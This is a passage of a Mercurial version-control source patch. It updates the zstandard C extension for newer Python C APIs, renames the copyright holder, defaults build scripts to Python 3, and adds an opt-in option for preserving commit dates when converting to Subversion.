if (PyType_Ready(&ZstdCompressorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressoriterator.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressoriterator.c Tue Apr 20 11:01:06 2021 -0400
@@ -228,7 +228,7 @@
};
void compressoriterator_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressorIteratorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressorIteratorType, &PyType_Type);
if (PyType_Ready(&ZstdCompressorIteratorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressionreader.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressionreader.c Tue Apr 20 11:01:06 2021 -0400
@@ -774,7 +774,7 @@
void decompressionreader_module_init(PyObject* mod) {
/* TODO make reader a sub-class of io.RawIOBase */
- Py_TYPE(&ZstdDecompressionReaderType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressionReaderType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressionReaderType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressionwriter.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressionwriter.c Tue Apr 20 11:01:06 2021 -0400
@@ -288,7 +288,7 @@
};
void decompressionwriter_module_init(PyObject* mod) {
- Py_TYPE(&ZstdDecompressionWriterType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressionWriterType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressionWriterType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressobj.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressobj.c Tue Apr 20 11:01:06 2021 -0400
@@ -195,7 +195,7 @@
};
void decompressobj_module_init(PyObject* module) {
- Py_TYPE(&ZstdDecompressionObjType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressionObjType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressionObjType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressor.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressor.c Tue Apr 20 11:01:06 2021 -0400
@@ -1811,7 +1811,7 @@
};
void decompressor_module_init(PyObject* mod) {
- Py_TYPE(&ZstdDecompressorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressorType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressoriterator.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressoriterator.c Tue Apr 20 11:01:06 2021 -0400
@@ -242,7 +242,7 @@
};
void decompressoriterator_module_init(PyObject* mod) {
- Py_TYPE(&ZstdDecompressorIteratorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressorIteratorType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressorIteratorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/frameparams.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/frameparams.c Tue Apr 20 11:01:06 2021 -0400
@@ -128,7 +128,7 @@
};
void frameparams_module_init(PyObject* mod) {
- Py_TYPE(&FrameParametersType) = &PyType_Type;
+ Py_SET_TYPE(&FrameParametersType, &PyType_Type);
if (PyType_Ready(&FrameParametersType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/python-zstandard.h Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/python-zstandard.h Tue Apr 20 11:01:06 2021 -0400
@@ -9,6 +9,7 @@
#define PY_SSIZE_T_CLEAN
#include <Python.h>
#include "structmember.h"
+#include <pythoncapi_compat.h>
#define ZSTD_STATIC_LINKING_ONLY
#define ZDICT_STATIC_LINKING_ONLY
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,283 @@
+// Header file providing new functions of the Python C API to old Python
+// versions.
+//
+// File distributed under the MIT license.
+//
+// Homepage:
+// https://github.com/pythoncapi/pythoncapi_compat
+//
+// Latest version:
+// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h
+
+#ifndef PYTHONCAPI_COMPAT
+#define PYTHONCAPI_COMPAT
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#include <Python.h>
+#include "frameobject.h" // PyFrameObject, PyFrame_GetBack()
+
+
+/* VC 2008 doesn't know about the inline keyword. */
+#if defined(_MSC_VER) && _MSC_VER < 1900
+#define inline __forceinline
+#endif
+
+// Cast argument to PyObject* type.
+#ifndef _PyObject_CAST
+# define _PyObject_CAST(op) ((PyObject*)(op))
+#endif
+
+
+// bpo-42262 added Py_NewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef)
+static inline PyObject* _Py_NewRef(PyObject *obj)
+{
+ Py_INCREF(obj);
+ return obj;
+}
+#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-42262 added Py_XNewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef)
+static inline PyObject* _Py_XNewRef(PyObject *obj)
+{
+ Py_XINCREF(obj);
+ return obj;
+}
+#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT)
+static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt)
+{
+ ob->ob_refcnt = refcnt;
+}
+#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt)
+#endif
+
+
+// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE)
+static inline void
+_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
+{
+ ob->ob_type = type;
+}
+#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
+#endif
+
+
+// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE)
+static inline void
+_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size)
+{
+ ob->ob_size = size;
+}
+#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size)
+#endif
+
+
+// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyCodeObject*
+PyFrame_GetCode(PyFrameObject *frame)
+{
+ PyCodeObject *code;
+ assert(frame != NULL);
+ code = frame->f_code;
+ assert(code != NULL);
+ Py_INCREF(code);
+ return code;
+}
+#endif
+
+static inline PyCodeObject*
+_PyFrame_GetCodeBorrow(PyFrameObject *frame)
+{
+ PyCodeObject *code = PyFrame_GetCode(frame);
+ Py_DECREF(code);
+ return code; // borrowed reference
+}
+
+
+// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyFrame_GetBack(PyFrameObject *frame)
+{
+ PyFrameObject *back;
+ assert(frame != NULL);
+ back = frame->f_back;
+ Py_XINCREF(back);
+ return back;
+}
+#endif
+
+static inline PyFrameObject*
+_PyFrame_GetBackBorrow(PyFrameObject *frame)
+{
+ PyFrameObject *back = PyFrame_GetBack(frame);
+ Py_XDECREF(back);
+ return back; // borrowed reference
+}
+
+
+// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyThreadState_GetInterpreter(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->interp;
+}
+#endif
+
+
+// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyThreadState_GetFrame(PyThreadState *tstate)
+{
+ PyFrameObject *frame;
+ assert(tstate != NULL);
+ frame = tstate->frame;
+ Py_XINCREF(frame);
+ return frame;
+}
+#endif
+
+static inline PyFrameObject*
+_PyThreadState_GetFrameBorrow(PyThreadState *tstate)
+{
+ PyFrameObject *frame = PyThreadState_GetFrame(tstate);
+ Py_XDECREF(frame);
+ return frame; // borrowed reference
+}
+
+
+// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyInterpreterState_Get(void)
+{
+ PyThreadState *tstate;
+ PyInterpreterState *interp;
+
+ tstate = PyThreadState_GET();
+ if (tstate == NULL) {
+ Py_FatalError("GIL released (tstate is NULL)");
+ }
+ interp = tstate->interp;
+ if (interp == NULL) {
+ Py_FatalError("no current interpreter");
+ }
+ return interp;
+}
+#endif
+
+
+// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a6
+#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6
+static inline uint64_t
+PyThreadState_GetID(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->id;
+}
+#endif
+
+
+// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1
+#if PY_VERSION_HEX < 0x030900A1
+static inline PyObject*
+PyObject_CallNoArgs(PyObject *func)
+{
+ return PyObject_CallFunctionObjArgs(func, NULL);
+}
+#endif
+
+
+// bpo-39245 made PyObject_CallOneArg() public (previously called
+// _PyObject_CallOneArg) in Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4
+static inline PyObject*
+PyObject_CallOneArg(PyObject *func, PyObject *arg)
+{
+ return PyObject_CallFunctionObjArgs(func, arg, NULL);
+}
+#endif
+
+
+// bpo-40024 added PyModule_AddType() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline int
+PyModule_AddType(PyObject *module, PyTypeObject *type)
+{
+ const char *name, *dot;
+
+ if (PyType_Ready(type) < 0) {
+ return -1;
+ }
+
+ // inline _PyType_Name()
+ name = type->tp_name;
+ assert(name != NULL);
+ dot = strrchr(name, '.');
+ if (dot != NULL) {
+ name = dot + 1;
+ }
+
+ Py_INCREF(type);
+ if (PyModule_AddObject(module, name, (PyObject *)type) < 0) {
+ Py_DECREF(type);
+ return -1;
+ }
+
+ return 0;
+}
+#endif
+
+
+// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6.
+// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2.
+#if PY_VERSION_HEX < 0x030900A6
+static inline int
+PyObject_GC_IsTracked(PyObject* obj)
+{
+ return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj));
+}
+#endif
+
+// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6.
+// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final.
+#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0
+static inline int
+PyObject_GC_IsFinalized(PyObject *obj)
+{
+ return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1));
+}
+#endif
+
+
+// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE)
+static inline int
+_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) {
+ return ob->ob_type == type;
+}
+#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type)
+#endif
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif // PYTHONCAPI_COMPAT
--- a/contrib/win32/ReadMe.html Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/win32/ReadMe.html Tue Apr 20 11:01:06 2021 -0400
@@ -140,7 +140,7 @@
</p>
<p>
- Mercurial is Copyright 2005-2021 Matt Mackall and others.
+ Mercurial is Copyright 2005-2021 Olivia Mackall and others.
</p>
<p>
--- a/contrib/win32/hg.bat Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/win32/hg.bat Tue Apr 20 11:01:06 2021 -0400
@@ -4,6 +4,8 @@
setlocal
set HG=%~f0
+set PYTHONLEGACYWINDOWSSTDIO=1
+
rem Use a full path to Python (relative to this script) if it exists,
rem as the standard Python install does not put python.exe on the PATH...
rem Otherwise, expect that python.exe can be found on the PATH.
--- a/doc/Makefile Thu Mar 25 19:06:28 2021 -0400
+++ b/doc/Makefile Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,14 @@
PREFIX=/usr/local
MANDIR=$(PREFIX)/share/man
INSTALL=install -m 644
-PYTHON?=python
+# Default to Python 3.
+#
+# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is.
+ifeq ($(OS),Windows_NT)
+PYTHON?=py -3
+else
+PYTHON?=python3
+endif
RSTARGS=
export HGENCODING=UTF-8
--- a/doc/gendoc.py Thu Mar 25 19:06:28 2021 -0400
+++ b/doc/gendoc.py Tue Apr 20 11:01:06 2021 -0400
@@ -31,6 +31,7 @@
commands,
encoding,
extensions,
+ fancyopts,
help,
minirst,
pycompat,
@@ -86,6 +87,8 @@
if b'\n' in desc:
# only remove line breaks and indentation
desc = b' '.join(l.lstrip() for l in desc.split(b'\n'))
+ if isinstance(default, fancyopts.customopt):
+ default = default.getdefaultvalue()
if default:
default = stringutil.forcebytestr(default)
desc += _(b" (default: %s)") % default
@@ -314,7 +317,12 @@
ui.write(b"\n")
# aliases
if d[b'aliases']:
- ui.write(_(b" aliases: %s\n\n") % b" ".join(d[b'aliases']))
+ # Note the empty comment, this is required to separate this
+ # (which should be a blockquote) from any preceding things (such
+ # as a definition list).
+ ui.write(
+ _(b"..\n\n aliases: %s\n\n") % b" ".join(d[b'aliases'])
+ )
def allextensionnames():
@@ -327,6 +335,11 @@
doc = encoding.strtolocal(sys.argv[1])
ui = uimod.ui.load()
+ # Trigger extensions to load. This is disabled by default because it uses
+ # the current user's configuration, which is often not what is wanted.
+ if encoding.environ.get(b'GENDOC_LOAD_CONFIGURED_EXTENSIONS', b'0') != b'0':
+ extensions.loadall(ui)
+
if doc == b'hg.1.gendoc':
showdoc(ui)
else:
--- a/doc/runrst Thu Mar 25 19:06:28 2021 -0400
+++ b/doc/runrst Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# runrst - register custom roles and run correct writer
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2010 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hg Thu Mar 25 19:06:28 2021 -0400
+++ b/hg Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# mercurial - scalable distributed SCM
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgdemandimport/demandimportpy2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgdemandimport/demandimportpy2.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# demandimport.py - global demand-loading of modules for Mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/absorb.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/absorb.py Tue Apr 20 11:01:06 2021 -0400
@@ -102,6 +102,9 @@
class emptyfilecontext(object):
"""minimal filecontext representing an empty file"""
+ def __init__(self, repo):
+ self._repo = repo
+
def data(self):
return b''
@@ -212,7 +215,7 @@
if path in pctx:
fctxs.append(pctx[path])
else:
- fctxs.append(emptyfilecontext())
+ fctxs.append(emptyfilecontext(pctx.repo()))
fctxs.reverse()
# note: we rely on a property of hg: filerev is not reused for linear
--- a/hgext/blackbox.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/blackbox.py Tue Apr 20 11:01:06 2021 -0400
@@ -38,7 +38,7 @@
[blackbox]
# Include nanoseconds in log entries with %f (see Python function
# datetime.datetime.strftime)
- date-format = '%Y-%m-%d @ %H:%M:%S.%f'
+ date-format = %Y-%m-%d @ %H:%M:%S.%f
"""
--- a/hgext/churn.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/churn.py Tue Apr 20 11:01:06 2021 -0400
@@ -38,11 +38,16 @@
def changedlines(ui, repo, ctx1, ctx2, fmatch):
added, removed = 0, 0
diff = b''.join(patch.diff(repo, ctx1.node(), ctx2.node(), fmatch))
+ inhunk = False
for l in diff.split(b'\n'):
- if l.startswith(b"+") and not l.startswith(b"+++ "):
+ if inhunk and l.startswith(b"+"):
added += 1
- elif l.startswith(b"-") and not l.startswith(b"--- "):
+ elif inhunk and l.startswith(b"-"):
removed += 1
+ elif l.startswith(b"@"):
+ inhunk = True
+ elif l.startswith(b"d"):
+ inhunk = False
return (added, removed)
--- a/hgext/convert/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# convert.py Foreign SCM converter
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -491,6 +491,22 @@
:convert.skiptags: does not convert tags from the source repo to the target
repo. The default is False.
+
+ Subversion Destination
+ ######################
+
+ Original commit dates are not preserved by default.
+
+ :convert.svn.dangerous-set-commit-dates: preserve original commit dates,
+ forcefully setting ``svn:date`` revision properties. This option is
+ DANGEROUS and may break some subversion functionality for the resulting
+ repository (e.g. filtering revisions with date ranges in ``svn log``),
+ as original commit dates are not guaranteed to be monotonically
+ increasing.
+
+ For commit dates setting to work destination repository must have
+ ``pre-revprop-change`` hook configured to allow setting of ``svn:date``
+ revision properties. See Subversion documentation for more details.
"""
return convcmd.convert(ui, src, dest, revmapfile, **opts)
--- a/hgext/convert/common.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/common.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# common.py - common code for the convert extension
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/convcmd.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/convcmd.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# convcmd - convert extension commands definition
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/cvs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/cvs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/darcs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/darcs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# darcs.py - darcs support for the convert extension
#
-# Copyright 2007-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2007-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/git.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/git.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# git.py - git support for the convert extension
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -247,7 +247,8 @@
b'\n'.join(line.strip() for line in content.split(b'\n')),
)
for sec in c.sections():
- s = c[sec]
+ # turn the config object into a real dict
+ s = dict(c.items(sec))
if b'url' in s and b'path' in s:
self.submodules.append(submodule(s[b'path'], b'', s[b'url']))
--- a/hgext/convert/hg.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/hg.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# hg.py - hg backend for convert extension
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/subversion.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/subversion.py Tue Apr 20 11:01:06 2021 -0400
@@ -97,6 +97,17 @@
return s.decode(fsencoding).encode('utf-8')
+def formatsvndate(date):
+ return dateutil.datestr(date, b'%Y-%m-%dT%H:%M:%S.000000Z')
+
+
+def parsesvndate(s):
+ # Example SVN datetime. Includes microseconds.
+ # ISO-8601 conformant
+ # '2007-01-04T17:35:00.902377Z'
+ return dateutil.parsedate(s[:19] + b' UTC', [b'%Y-%m-%dT%H:%M:%S'])
+
+
class SvnPathNotFound(Exception):
pass
@@ -1158,12 +1169,7 @@
continue
paths.append((path, ent))
- # Example SVN datetime. Includes microseconds.
- # ISO-8601 conformant
- # '2007-01-04T17:35:00.902377Z'
- date = dateutil.parsedate(
- date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"]
- )
+ date = parsesvndate(date)
if self.ui.configbool(b'convert', b'localtimezone'):
date = makedatetimestamp(date[0])
@@ -1380,7 +1386,7 @@
return logstream(stdout)
-pre_revprop_change = b'''#!/bin/sh
+pre_revprop_change_template = b'''#!/bin/sh
REPOS="$1"
REV="$2"
@@ -1388,15 +1394,26 @@
PROPNAME="$4"
ACTION="$5"
-if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi
-if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi
-if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi
+%(rules)s
echo "Changing prohibited revision property" >&2
exit 1
'''
+def gen_pre_revprop_change_hook(prop_actions_allowed):
+ rules = []
+ for action, propname in prop_actions_allowed:
+ rules.append(
+ (
+ b'if [ "$ACTION" = "%s" -a "$PROPNAME" = "%s" ]; '
+ b'then exit 0; fi'
+ )
+ % (action, propname)
+ )
+ return pre_revprop_change_template % {b'rules': b'\n'.join(rules)}
+
+
class svn_sink(converter_sink, commandline):
commit_re = re.compile(br'Committed revision (\d+).', re.M)
uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M)
@@ -1470,9 +1487,20 @@
self.is_exec = None
if created:
+ prop_actions_allowed = [
+ (b'M', b'svn:log'),
+ (b'A', b'hg:convert-branch'),
+ (b'A', b'hg:convert-rev'),
+ ]
+
+ if self.ui.configbool(
+ b'convert', b'svn.dangerous-set-commit-dates'
+ ):
+ prop_actions_allowed.append((b'M', b'svn:date'))
+
hook = os.path.join(created, b'hooks', b'pre-revprop-change')
fp = open(hook, b'wb')
- fp.write(pre_revprop_change)
+ fp.write(gen_pre_revprop_change_hook(prop_actions_allowed))
fp.close()
util.setflags(hook, False, True)
@@ -1667,6 +1695,23 @@
revprop=True,
revision=rev,
)
+
+ if self.ui.configbool(
+ b'convert', b'svn.dangerous-set-commit-dates'
+ ):
+ # Subverson always uses UTC to represent date and time
+ date = dateutil.parsedate(commit.date)
+ date = (date[0], 0)
+
+ # The only way to set date and time for svn commit is to use propset after commit is done
+ self.run(
+ b'propset',
+ b'svn:date',
+ formatsvndate(date),
+ revprop=True,
+ revision=rev,
+ )
+
for parent in parents:
self.addchild(parent, rev)
return self.revid(rev)
--- a/hgext/extdiff.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/extdiff.py Tue Apr 20 11:01:06 2021 -0400
@@ -91,7 +91,7 @@
from mercurial.i18n import _
from mercurial.node import (
- nullid,
+ nullrev,
short,
)
from mercurial import (
@@ -565,18 +565,18 @@
repo, [from_rev] + [to_rev], b'nowarn'
)
ctx1a = scmutil.revsingle(repo, from_rev, None)
- ctx1b = repo[nullid]
+ ctx1b = repo[nullrev]
ctx2 = scmutil.revsingle(repo, to_rev, None)
else:
ctx1a, ctx2 = scmutil.revpair(repo, revs)
if not revs:
ctx1b = repo[None].p2()
else:
- ctx1b = repo[nullid]
+ ctx1b = repo[nullrev]
# Disable 3-way merge if there is only one parent
if do3way:
- if ctx1b.node() == nullid:
+ if ctx1b.rev() == nullrev:
do3way = False
matcher = scmutil.match(ctx2, pats, opts)
--- a/hgext/fastannotate/protocol.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/fastannotate/protocol.py Tue Apr 20 11:01:06 2021 -0400
@@ -20,6 +20,9 @@
wireprotov1peer,
wireprotov1server,
)
+from mercurial.utils import (
+ urlutil,
+)
from . import context
# common
@@ -151,9 +154,9 @@
def annotatepeer(repo):
ui = repo.ui
- remotepath = ui.expandpath(
- ui.config(b'fastannotate', b'remotepath', b'default')
- )
+ remotedest = ui.config(b'fastannotate', b'remotepath', b'default')
+ r = urlutil.get_unique_pull_path(b'fastannotate', repo, ui, remotedest)
+ remotepath = r[0]
peer = hg.peer(ui, {}, remotepath)
try:
--- a/hgext/fetch.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/fetch.py Tue Apr 20 11:01:06 2021 -0400
@@ -19,9 +19,11 @@
lock,
pycompat,
registrar,
- util,
)
-from mercurial.utils import dateutil
+from mercurial.utils import (
+ dateutil,
+ urlutil,
+)
release = lock.release
cmdtable = {}
@@ -107,10 +109,9 @@
)
)
- other = hg.peer(repo, opts, ui.expandpath(source))
- ui.status(
- _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source))
- )
+ path = urlutil.get_unique_pull_path(b'fetch', repo, ui, source)[0]
+ other = hg.peer(repo, opts, path)
+ ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(path))
revs = None
if opts[b'rev']:
try:
@@ -180,7 +181,7 @@
if not err:
# we don't translate commit messages
message = cmdutil.logmessage(ui, opts) or (
- b'Automated merge with %s' % util.removeauth(other.url())
+ b'Automated merge with %s' % urlutil.removeauth(other.url())
)
editopt = opts.get(b'edit') or opts.get(b'force_editor')
editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch')
--- a/hgext/fix.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/fix.py Tue Apr 20 11:01:06 2021 -0400
@@ -131,8 +131,10 @@
import subprocess
from mercurial.i18n import _
-from mercurial.node import nullrev
-from mercurial.node import wdirrev
+from mercurial.node import (
+ nullrev,
+ wdirrev,
+)
from mercurial.utils import procutil
@@ -433,8 +435,9 @@
if not (len(revs) == 1 and wdirrev in revs):
cmdutil.checkunfinished(repo)
rewriteutil.precheck(repo, revs, b'fix')
- if wdirrev in revs and list(
- mergestatemod.mergestate.read(repo).unresolved()
+ if (
+ wdirrev in revs
+ and mergestatemod.mergestate.read(repo).unresolvedcount()
):
raise error.Abort(b'unresolved conflicts', hint=b"use 'hg resolve'")
if not revs:
--- a/hgext/git/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/git/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -90,7 +90,7 @@
return os.path.join(self.path, b'..', b'.hg', f)
raise NotImplementedError(b'Need to pick file for %s.' % f)
- def changelog(self, trypending):
+ def changelog(self, trypending, concurrencychecker):
# TODO we don't have a plan for trypending in hg's git support yet
return gitlog.changelog(self.git, self._db)
--- a/hgext/git/gitlog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/git/gitlog.py Tue Apr 20 11:01:06 2021 -0400
@@ -8,6 +8,7 @@
nullhex,
nullid,
nullrev,
+ sha1nodeconstants,
wdirhex,
)
from mercurial import (
@@ -217,7 +218,7 @@
n = nodeorrev
# handle looking up nullid
if n == nullid:
- return hgchangelog._changelogrevision(extra={})
+ return hgchangelog._changelogrevision(extra={}, manifest=nullid)
hn = gitutil.togitnode(n)
# We've got a real commit!
files = [
@@ -422,6 +423,8 @@
class manifestlog(baselog):
+ nodeconstants = sha1nodeconstants
+
def __getitem__(self, node):
return self.get(b'', node)
--- a/hgext/histedit.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/histedit.py Tue Apr 20 11:01:06 2021 -0400
@@ -242,6 +242,7 @@
from mercurial.utils import (
dateutil,
stringutil,
+ urlutil,
)
pickle = util.pickle
@@ -1040,11 +1041,12 @@
Used by initialization code"""
if opts is None:
opts = {}
- dest = ui.expandpath(remote or b'default-push', remote or b'default')
- dest, branches = hg.parseurl(dest, None)[:2]
- ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
-
- revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
+ path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote)
+ dest = path.pushloc or path.loc
+
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest))
+
